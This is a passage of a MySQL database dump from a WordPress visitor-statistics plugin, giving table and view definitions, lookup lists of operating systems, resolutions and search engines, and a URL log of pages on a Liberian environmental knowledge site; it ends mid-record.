/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWiseBounce`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_monthWiseBounce` AS SELECT 
 1 AS `recordMonth`,
 1 AS `bounce`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_monthWiseBounceRate`
--

DROP TABLE IF EXISTS `wp_wsm_monthWiseBounceRate`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWiseBounceRate`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_monthWiseBounceRate` AS SELECT 
 1 AS `recordMonth`,
 1 AS `bounce`,
 1 AS `pageViews`,
 1 AS `visitors`,
 1 AS `bRatePageViews`,
 1 AS `bRateVisitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_monthWiseFirstVisitors`
--

DROP TABLE IF EXISTS `wp_wsm_monthWiseFirstVisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWiseFirstVisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_monthWiseFirstVisitors` AS SELECT 
 1 AS `recordMonth`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_monthWisePageViews`
--

DROP TABLE IF EXISTS `wp_wsm_monthWisePageViews`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWisePageViews`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_monthWisePageViews` AS SELECT 
 1 AS `recordMonth`,
 1 AS `pageViews`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_monthWiseVisitors`
--

DROP TABLE IF EXISTS `wp_wsm_monthWiseVisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWiseVisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_monthWiseVisitors` AS SELECT 
 1 AS `recordMonth`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Table structure for table `wp_wsm_monthlyDailyReport`
--

DROP TABLE IF EXISTS `wp_wsm_monthlyDailyReport`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_monthlyDailyReport` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `reportMonthYear` varchar(50) NOT NULL,
  `content` text NOT NULL,
  `timezone` varchar(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_monthlyDailyReport`
--

LOCK TABLES `wp_wsm_monthlyDailyReport` WRITE;
/*!40000 ALTER TABLE `wp_wsm_monthlyDailyReport` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wsm_monthlyDailyReport` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_monthlydailyreport`
--

DROP TABLE IF EXISTS `wp_wsm_monthlydailyreport`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_monthlydailyreport` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `reportMonthYear` varchar(50) NOT NULL,
  `content` text NOT NULL,
  `timezone` varchar(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_monthlydailyreport`
--

LOCK TABLES `wp_wsm_monthlydailyreport` WRITE;
/*!40000 ALTER TABLE `wp_wsm_monthlydailyreport` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wsm_monthlydailyreport` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_monthwise_report`
--

DROP TABLE IF EXISTS `wp_wsm_monthwise_report`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_monthwise_report` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `normal` int(2) NOT NULL DEFAULT '0',
  `hour` int(2) NOT NULL DEFAULT '0',
  `search_engine` varchar(255) NOT NULL DEFAULT '',
  `browser` int(2) NOT NULL DEFAULT '0',
  `screen` int(2) NOT NULL DEFAULT '0',
  `country` int(3) NOT NULL DEFAULT '0',
  `city` varchar(255) NOT NULL DEFAULT '',
  `operating_system` int(2) NOT NULL DEFAULT '0',
  `url_id` int(11) NOT NULL DEFAULT '0',
  `total_page_views` int(11) NOT NULL DEFAULT '0',
  `total_visitors` int(11) NOT NULL DEFAULT '0',
  `total_first_time_visitors` int(11) NOT NULL DEFAULT '0',
  `total_bounce` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_monthwise_report`
--

LOCK TABLES `wp_wsm_monthwise_report` WRITE;
/*!40000 ALTER TABLE `wp_wsm_monthwise_report` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wsm_monthwise_report` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Temporary table structure for view `wp_wsm_monthwisevisitors`
--

DROP TABLE IF EXISTS `wp_wsm_monthwisevisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthwisevisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_monthwisevisitors` AS SELECT 
 1 AS `recordMonth`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Table structure for table `wp_wsm_oSystems`
--

DROP TABLE IF EXISTS `wp_wsm_oSystems`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_oSystems` (
  `id` tinyint(2) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_oSystems`
--

LOCK TABLES `wp_wsm_oSystems` WRITE;
/*!40000 ALTER TABLE `wp_wsm_oSystems` DISABLE KEYS */;
INSERT INTO `wp_wsm_oSystems` VALUES (1,'Windows 98'),(2,'Windows CE'),(3,'Linux'),(4,'Unix'),(5,'Windows 2000'),(6,'Windows XP'),(7,'Windows 8'),(8,'Windows 10'),(9,'Mac OS'),(10,'Android'),(11,'IOS'),(12,'Windows 7'),(13,'Windows 8.1'),(14,'Mac OS X'),(15,'-');
/*!40000 ALTER TABLE `wp_wsm_oSystems` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_osystems`
--

DROP TABLE IF EXISTS `wp_wsm_osystems`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_osystems` (
  `id` tinyint(2) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_osystems`
--

LOCK TABLES `wp_wsm_osystems` WRITE;
/*!40000 ALTER TABLE `wp_wsm_osystems` DISABLE KEYS */;
INSERT INTO `wp_wsm_osystems` VALUES (1,'Windows 98'),(2,'Windows CE'),(3,'Linux'),(4,'Unix'),(5,'Windows 2000'),(6,'Windows XP'),(7,'Windows 8'),(8,'Windows 10'),(9,'Mac OS'),(10,'Android'),(11,'IOS'),(12,'Windows 7'),(13,'Windows 8.1'),(14,'Mac OS X'),(15,'-');
/*!40000 ALTER TABLE `wp_wsm_osystems` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Temporary table structure for view `wp_wsm_pageViews`
--

DROP TABLE IF EXISTS `wp_wsm_pageViews`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_pageViews`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_pageViews` AS SELECT 
 1 AS `visitId`,
 1 AS `URLId`,
 1 AS `keyword`,
 1 AS `refererUrlId`,
 1 AS `countryId`,
 1 AS `regionId`,
 1 AS `totalViews`,
 1 AS `visitLastActionTime`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_pageviews`
--

DROP TABLE IF EXISTS `wp_wsm_pageviews`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_pageviews`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_pageviews` AS SELECT 
 1 AS `visitId`,
 1 AS `URLId`,
 1 AS `keyword`,
 1 AS `refererUrlId`,
 1 AS `countryId`,
 1 AS `regionId`,
 1 AS `totalViews`,
 1 AS `visitLastActionTime`*/;
SET character_set_client = @saved_cs_client;

--
-- Table structure for table `wp_wsm_regions`
--

DROP TABLE IF EXISTS `wp_wsm_regions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_regions` (
  `id` tinyint(1) unsigned NOT NULL AUTO_INCREMENT,
  `code` char(2) NOT NULL COMMENT 'Region code',
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_regions`
--

LOCK TABLES `wp_wsm_regions` WRITE;
/*!40000 ALTER TABLE `wp_wsm_regions` DISABLE KEYS */;
INSERT INTO `wp_wsm_regions` VALUES (1,'AF','Africa'),(2,'AN','Antarctica'),(3,'AS','Asia'),(4,'EU','Europe'),(5,'NA','North America'),(6,'OC','Oceania'),(7,'SA','South America');
/*!40000 ALTER TABLE `wp_wsm_regions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_resolutions`
--

DROP TABLE IF EXISTS `wp_wsm_resolutions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_resolutions` (
  `id` tinyint(2) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=47 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_resolutions`
--

LOCK TABLES `wp_wsm_resolutions` WRITE;
/*!40000 ALTER TABLE `wp_wsm_resolutions` DISABLE KEYS */;
INSERT INTO `wp_wsm_resolutions` VALUES (1,'640x480'),(2,'800x600'),(3,'960x720'),(4,'1024x768'),(5,'1280x960'),(6,'1400x1050'),(7,'1440x1080'),(8,'1600x1200'),(9,'1856x1392'),(10,'1920x1440'),(11,'2048x1536'),(12,'1280x800'),(13,'1440x900'),(14,'1680x1050'),(15,'1920x1200'),(16,'2560x1600'),(17,'1024x576'),(18,'1152x648'),(19,'1280x720'),(20,'1366x768'),(21,'1600x900'),(22,'1920x1080'),(23,'2560x1440'),(24,'3840x2160'),(25,'375x812'),(26,'384x800'),(27,'412x915'),(28,'390x844'),(29,'412x869'),(30,'360x640'),(31,'428x926'),(32,'360x740'),(33,'1536x864'),(34,'1254x705'),(35,'412x892'),(36,'360x780'),(37,'412x732'),(38,'320x569'),(39,'360x800'),(40,'768x1024'),(41,'360x760'),(42,'360x720'),(43,'375x667'),(44,'360x774'),(45,'360x820'),(46,'1600x1600');
/*!40000 ALTER TABLE `wp_wsm_resolutions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_searchEngines`
--

DROP TABLE IF EXISTS `wp_wsm_searchEngines`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_searchEngines` (
  `id` tinyint(2) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_searchEngines`
--

LOCK TABLES `wp_wsm_searchEngines` WRITE;
/*!40000 ALTER TABLE `wp_wsm_searchEngines` DISABLE KEYS */;
INSERT INTO `wp_wsm_searchEngines` VALUES (1,'Google'),(2,'Bing'),(3,'Yahoo'),(4,'Baidu'),(5,'AOL'),(6,'Ask'),(7,'Excite'),(8,'Duck Duck Go'),(9,'WolframAlpha'),(10,'Yandex'),(11,'Lycos'),(12,'Chacha');
/*!40000 ALTER TABLE `wp_wsm_searchEngines` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_searchengines`
--

DROP TABLE IF EXISTS `wp_wsm_searchengines`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_searchengines` (
  `id` tinyint(2) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_searchengines`
--

LOCK TABLES `wp_wsm_searchengines` WRITE;
/*!40000 ALTER TABLE `wp_wsm_searchengines` DISABLE KEYS */;
INSERT INTO `wp_wsm_searchengines` VALUES (1,'Google'),(2,'Bing'),(3,'Yahoo'),(4,'Baidu'),(5,'AOL'),(6,'Ask'),(7,'Excite'),(8,'Duck Duck Go'),(9,'WolframAlpha'),(10,'Yandex'),(11,'Lycos'),(12,'Chacha');
/*!40000 ALTER TABLE `wp_wsm_searchengines` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_toolBars`
--

DROP TABLE IF EXISTS `wp_wsm_toolBars`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_toolBars` (
  `id` tinyint(2) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_toolBars`
--

LOCK TABLES `wp_wsm_toolBars` WRITE;
/*!40000 ALTER TABLE `wp_wsm_toolBars` DISABLE KEYS */;
INSERT INTO `wp_wsm_toolBars` VALUES (1,'Alexa'),(2,'AOL'),(3,'Bing'),(4,'Data'),(5,'Google'),(6,'Kiwee'),(7,'Mirar'),(8,'Windows Live'),(9,'Yahoo');
/*!40000 ALTER TABLE `wp_wsm_toolBars` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_toolbars`
--

DROP TABLE IF EXISTS `wp_wsm_toolbars`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_toolbars` (
  `id` tinyint(2) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_toolbars`
--

LOCK TABLES `wp_wsm_toolbars` WRITE;
/*!40000 ALTER TABLE `wp_wsm_toolbars` DISABLE KEYS */;
INSERT INTO `wp_wsm_toolbars` VALUES (1,'Alexa'),(2,'AOL'),(3,'Bing'),(4,'Data'),(5,'Google'),(6,'Kiwee'),(7,'Mirar'),(8,'Windows Live'),(9,'Yahoo');
/*!40000 ALTER TABLE `wp_wsm_toolbars` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Temporary table structure for view `wp_wsm_uniqueVisitors`
--

DROP TABLE IF EXISTS `wp_wsm_uniqueVisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_uniqueVisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_uniqueVisitors` AS SELECT 
 1 AS `id`,
 1 AS `visitorId`,
 1 AS `totalTimeVisit`,
 1 AS `firstVisitTime`,
 1 AS `refererUrlId`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_uniquevisitors`
--

DROP TABLE IF EXISTS `wp_wsm_uniquevisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_uniquevisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_uniquevisitors` AS SELECT 
 1 AS `id`,
 1 AS `visitorId`,
 1 AS `totalTimeVisit`,
 1 AS `firstVisitTime`,
 1 AS `refererUrlId`*/;
SET character_set_client = @saved_cs_client;

--
-- Table structure for table `wp_wsm_url_log`
--

DROP TABLE IF EXISTS `wp_wsm_url_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_url_log` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `pageId` int(10) unsigned DEFAULT NULL,
  `title` text,
  `hash` varchar(20) NOT NULL,
  `protocol` varchar(10) NOT NULL,
  `url` text,
  `searchEngine` int(2) unsigned DEFAULT NULL,
  `toolBar` int(2) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `index_type_hash` (`pageId`,`hash`,`searchEngine`),
  KEY `index_tb_hash` (`pageId`,`hash`,`searchEngine`)
) ENGINE=InnoDB AUTO_INCREMENT=119 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_url_log`
--

LOCK TABLES `wp_wsm_url_log` WRITE;
/*!40000 ALTER TABLE `wp_wsm_url_log` DISABLE KEYS */;
INSERT INTO `wp_wsm_url_log` VALUES (1,1602,'Liberia Land Authority','7b7c73b2caa152a6','https://','ekmsliberia.info/institution/liberia-land-authority',0,0),(2,NULL,'Liberia Land Authority','170c2a520961924f','https://','ekmsliberia.info/wp-content/uploads/2019/11/Land_Rights_Policy-1.pdf',0,0),(3,1596,'Liberia Airport Authority','593e3f0502060cdb','https://','ekmsliberia.info/institution/liberia-airport-authority',0,0),(4,NULL,'Liberia Airport Authority','1d5920f4b44b27a8','https://','google.com',1,5),(5,9,'Home','cc914e4c94f66d24','https://','ekmsliberia.info/institution/liberia-land-authority/#',0,0),(6,9,'Home','459a069b2251feff','https://','ekmsliberia.info',0,0),(7,9,'Home','f66a48e6d7312ed0','https://','ekmsliberia.info/institution/liberia-airport-authority/#',0,0),(8,91,'Documents Database','293e4f1af1a73b40','https://','ekmsliberia.info/documents-database',0,4),(9,80,'Contact Us','38ee30c13c8ed2cb','https://','ekmsliberia.info/contact-us',0,0),(10,9,'Home','477c8c514f4f61ec','https://','bing.com',2,3),(11,9,'Home','0316c74e78b3cf67','https://','ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia',0,0),(12,1728,'The Liberia Land Authority Act','2807dea4531ae899','https://','ekmsliberia.info/document/the-liberia-land-authority-act',0,0),(13,9,'Home','3a9f6cd2ab3052fd','https://','ekmsliberia.info/wp-content/uploads/2019/11/Land_Authority_Act_2016.pdf',0,0),(14,9,'Home','9ad1a12477f8881d','https://','wash-liberia.org',0,0),(15,1598,'Ministry of Transport','f4fa7f1e3ea54a73','https://','ekmsliberia.info/institution/ministry-of-transport',0,0),(16,1582,'Environmental Protection Agency','7367f09125f1587f','https://','ekmsliberia.info/institution/environmental-protection-agency',0,0),(17,9,'Home','ae48abb424551107','https://','search.yahoo.com',3,9),(18,9,'Home','bee2c2e5855db18f','https://','ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Mining-Law-2000.pdf-1.pdf',0,0),(19,9,'Home','80bc7d8fef244809','https://','ekmsliberia.info/wp-content/uploads/2021/03/Wonegizi-REDDProject-Carbon-Baseline-Report.pdf',0,0),(20,9,'Home','338c98bee093aed6','https://','ekmsliberia.info/wp-content/uploads/2020/12/Brief-on-the-Minamata-Convention-on-Mercury.pdf',0,0),(21,9,'Home','cf1f261d7e47840f','https://','ekmsliberia.info/wp-content/uploads/2019/11/2009-01-01-regulation-–-2009-regulation-on-environmental-impact-assessment-–-liberia-ext-en.pdf',0,0),(22,9,'Home','fb04158ca760be7d','https://','ekmsliberia.info/knowledge-broker/benjamin-karmorh',0,0),(23,9,'Home','34fb2d48af6de83c','https://','ekms-liberia.mn.co',0,0),(24,9,'Home','3a097220ab9d00c3','https://','ekmsliberia.info/tag/climate-change',0,0),(25,3781,'Liberia’s Grassroots Solar Energy Innovator','a2216a3e7ac46c9c','https://','ekmsliberia.info/liberias-grassroots-solar-energy-innovator',0,0),(26,9,'Home','f413a41a4b9d0819','https://','ekmsliberia.info/vacancy',0,0),(27,1606,'Liberia Maritime Authority','c4bb8b0de3aabc5a','https://','ekmsliberia.info/institution/liberia-maritime-authority',0,0),(28,9,'Home','146bbef94335120e','https://','cbd.int',0,0),(29,3694,'Nagoya Protocol on Access and Benefits Sharing','503693d97d94bb7d','https://','ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing',0,0),(30,0,'Nagoya Protocol on Access and Benefits Sharing','1930412fe99b2c0c','https://','ekmsliberia.info/resource-tag/mme',0,0),(31,NULL,'Nagoya Protocol on Access and Benefits Sharing','afb1343ad1b196be','https://','duckduckgo.com',0,0),(32,2159,'Agenda for Transformation','71616ca000c95b68','https://','ekmsliberia.info/document/agenda-for-transformation',0,0),(33,NULL,'Agenda for Transformation','1186357fd6521069','https://','ekmsliberia.info/wp-content/uploads/2019/11/Act-creating-the-EPA-2002.pdf',0,0),(34,1594,'Ministry of Public Works','c4718ebe521f7459','https://','ekmsliberia.info/institution/ministry-of-public-works',0,0),(35,2297,'Title Registration Report','d76173905aea279d','https://','ekmsliberia.info/document/title-registration-report',0,0),(36,2751,'CBIT Project Document','b6cd4a183423c3ee','https://','ekmsliberia.info/document/cbit-project-document',0,0),(37,1612,'Conservation International','c0dd54491d037ca2','https://','ekmsliberia.info/institution/conservation-international',0,0),(38,87,'Related Topics','617a20697e2acc8f','https://','ekmsliberia.info/related-topics',0,0),(39,1586,'Forestry Development Authority','9b8afa57c07863b0','https://','ekmsliberia.info/institution/forestry-development-authority',0,0),(40,68,'About','1d5bfae1874e6875','https://','ekmsliberia.info/about',0,0),(41,3781,'Liberia’s Grassroots Solar Energy Innovator','83d3ca4a63161e50','https://','ekmsliberia.info/liberias-grassroots-solar-energy-innovator/?fbclid=IwAR1TIrRHiL2YiYaavQ7kLFE1rZv0XmaYb8zGGJMJqWoGyjeWg-daSmpiPdI',0,0),(42,NULL,'Liberia’s Grassroots Solar Energy Innovator','603bdc25ebf73487','http://','m.facebook.com',0,0),(43,89,'Institutions Resources','ff3d0a3b1b1aeb79','https://','ekmsliberia.info/institutions-resources',0,0),(44,84,'Multilateral Environmental Agreements','8f79a48561ba3b56','https://','ekmsliberia.info/multilateral-environmental-agreements',0,0),(45,3664,'Stockholm Convention on Persistent Organic Pollutants','748eadea6a47fc4e','https://','ekmsliberia.info/mea-resource/stockholm-convention',0,0),(46,3691,'Cartagena Protocol on Biosafety to the Convention on Biological Diversity','f71b654eb650d44d','https://','ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity',0,0),(47,1877,'United Nations Framework Convention on Climate Change','bc320a064e4c39f8','https://','ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change',0,0),(48,3004,'Ever Green Recycling','26f49b648a276125','https://','ekmsliberia.info/institution/ever-green-recycling',0,0),(49,NULL,'Ever Green Recycling','83c04328c2935e8a','https://','yandex.ru',10,0),(50,1724,'Fisheries and Aquaculture Sector Policy and Strategy','c13a3addfdad8442','https://','ekmsliberia.info/document/fisheries-and-aquaculture-sector-policy-and-strategy',0,0),(51,NULL,'Fisheries and Aquaculture Sector Policy and Strategy','e2aa3b6b3265f4ae','https://','ekmsliberia.info/wp-content/uploads/2019/11/fisheries_policy_doc.pdf',0,0),(52,3083,'Wild Chimpanzee Foundation','bb0bc752ad0fa119','https://','ekmsliberia.info/institution/wild-chimpanzee-foundation',0,0),(53,2704,'Ministry of Finance and Development Planning','682c2ea26c1bac21','https://','ekmsliberia.info/institution/ministry-of-finance-and-development-planning',0,0),(54,NULL,'Ministry of Finance and Development Planning','bf4eb2e9055ae9c6','https://','unfccc.int',0,0),(55,87,'Related Topics','57fedb0460377d11','https://','ekmsliberia.info/related-topics/#',0,0),(56,87,'Related Topics','02ce691b8fe0113f','https://','ekmsliberia.info/project-resource/the-mano-iwrm-project',0,0),(57,87,'Related Topics','c285255d54f9c159','https://','www4.unfccc.int/sites/NWPStaging/Pages/Home.aspx',0,0),(58,87,'Related Topics','7bf6651f1191f188','https://','ekmsliberia.info/document/piloting-redd-in-the-wonegizi-proposed-protected-area-community-benefits',0,0),(59,87,'Related Topics','96f38290784a2d97','http://','lla.gov.lr/web/index.php',0,0),(60,87,'Related Topics','9f7f37020fb91142','http://','liberia.opendataforafrica.org',0,4),(61,1600,'Ministry of Agriculture','8d8197a3ca4af821','https://','ekmsliberia.info/institution/ministry-of-agriculture',0,0),(62,NULL,'Ministry of Agriculture','78828056e027b2a4','http://','41.73.252.226/libata',0,0),(63,NULL,'Ministry of Agriculture','4e709462a3cfa6ab','https://','ekmsliberia.info/institutions-category/government',0,0),(64,472,'Dry and Sub-humid land Biodiversity','1e9977caa7079144','https://','ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity',0,0),(65,3680,'REFRENCE NO: TOR/CCCD/EPA-2021-001, Review and Provide Harmonization Proposals for  Amendment of the EPA Act by the Legislature','78e24597c63c30a2','https://','ekmsliberia.info/ekms-bulletin/refrence-no-tor-cccd-epa-2021-001-undertake-a-review-of-the-swot-and-gap-analysis',0,0),(66,1590,'National Legislature on Natural Resource Committee','8bc19c92419b94b9','https://','ekmsliberia.info/institution/national-legislature-on-natural-resource-committee',0,0),(67,1774,'National Cocoa Development Strategy','d4862a85f667d061','https://','ekmsliberia.info/document/national-cocoa-development-strategy',0,0),(68,NULL,'National Cocoa Development Strategy','e19e0e229267b69b','https://','ekmsliberia.info/wp-content/uploads/2019/11/NCDS_Final_2012.doc',0,0),(69,3764,'Liberia’s Private Sector is Set to Launch the Electric Kekeh Market &#8211; Emergi Liberia','0e7a80dc6935172a','https://','ekmsliberia.info/liberias-private-sector-is-set-to-launch-the-electric-kekeh-market-emergi-liberia',0,0),(70,1592,'Central Agricultural Research Institute','b5e7556ad99b8570','https://','ekmsliberia.info/institution/central-agricultural-research-institute',0,0),(71,NULL,'Central Agricultural Research Institute','60d2f4fe0275d790','http://','baidu.com',0,0),(72,1741,'Liberia Seed Development and Certification Agency Act','2fa205d73abdde76','https://','ekmsliberia.info/document/liberia-seed-development-and-certification-agency-act',0,0),(73,1610,'Ministry of Internal Affairs','73c903f0d1191c6c','https://','ekmsliberia.info/institution/ministry-of-internal-affairs',0,0),(74,2934,'Equator Prize 2020 &#8211; Call for Nominations','2b47dfbba0af1b8e','https://','ekmsliberia.info/ekms-bulletin/equator-prize-2020-call-for-nominations',0,0),(75,NULL,'Equator Prize 2020 &#8211; Call for Nominations','712ea6d1e478b0b3','https://','startpage.com',0,0),(76,570,'Liberia National Biodiversity Conservation Strategy and Action Plan','97383b5f966f8ea4','https://','ekmsliberia.info/document/liberia-national-biodiversity-conservation-strategy-and-action-plan',0,0),(77,1614,'Fauna &#038; Flora International','f84dc11cb5a10bbd','https://','ekmsliberia.info/institution/fauna-flora-international',0,0),(78,3777,'NaFAA Fines Illegal Ivorian Fisherman US$5,000.00','a09b20bc610263e5','https://','ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00',0,0),(79,2309,'Pro Poor Agenda for Prosperity and Development','528d9dc166769e38','https://','ekmsliberia.info/document/pro-poor-agenda-for-prosperity-and-development',0,0),(80,NULL,'Pro Poor Agenda for Prosperity and Development','4ba99f86a03ff6f3','https://','ekmsliberia.info/wp-content/uploads/2019/11/PAPD-pro-poor-agenda-for-prosperity-and-development.pdf',0,0),(81,3066,'EPA Shuts Down ‘Illegal’ Water Companies','2e0bc260c75fcc6a','https://','ekmsliberia.info/epa-shuts-down-illegal-water-companies',0,0),(82,3253,'Status of Liberia Implementation Minamata Convention on Mercury','1069bc2473e84211','https://','ekmsliberia.info/document/https-ekmsliberia-info-wp-content-uploads-2020-12-brief-on-the-minamata-convention-on-mercury-pdf',0,0),(83,3259,'Climate and Clean Air Coalition (CCAC)','9effccc175f7a22b','https://','ekmsliberia.info/document/climate-and-clean-air-coalition-ccac',0,0),(84,3109,'Ministry of Agriculture ANNUAL REPORT 